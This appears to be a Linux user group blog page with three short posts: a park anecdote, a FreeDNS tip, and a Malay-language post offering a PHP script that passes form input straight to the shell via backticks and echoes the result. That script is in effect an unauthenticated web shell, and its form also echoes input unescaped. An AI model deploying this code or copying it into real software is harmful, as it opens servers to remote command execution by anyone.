Jun 30

  
I bought the June’s edition of Linux For You last weekend. It came with the latest Ubuntu CD. My youngest son kept asking "What  is Spiderman  doing to the Penguin?"

On Sunday I took the kid to the park near our house. I brought the magazine along to show off so I could skim through it while looking after the kids :-). There was a guy near me who came with his 2 year old daughter.  Then all of the sudden he asked:

"Abang guna Linux ke?"

So then we chatted about different distros, torrent software, desktop environment, 3boss and our kids. This weekend we’ll probably have another meetup :-)

written by adli

Jun 23

Salam semua..
php dan bash. Jika mereka bekerja sama, mampu memeningkan kepala sistem admin. :)
skrip php di bawah memudahkan anda untuk melarikan bash dari php.

berhati2 menggunakannya.

————————————

<?php

$parameter = $_POST['parameter'];
$arahan= $_POST['arahan'];
echo `$arahan $parameter`;

?>
<form method=’post’ action= >
task:<input type=text name=arahan value=’<?php echo $arahan ?>’ >
<br>
param2:<input type=text name=parameter size=200 value=’<?php echo $parameter ?>’ >

<input type=submit value=’berani?’>
</form>

——————————————-

written by cperdana

Jun 02
I’m using FreeDNS these days so that I can  ssh home from anywhere. Its a free service powered by the FreeBSD operating systems. Check it out!

written by adli

my pass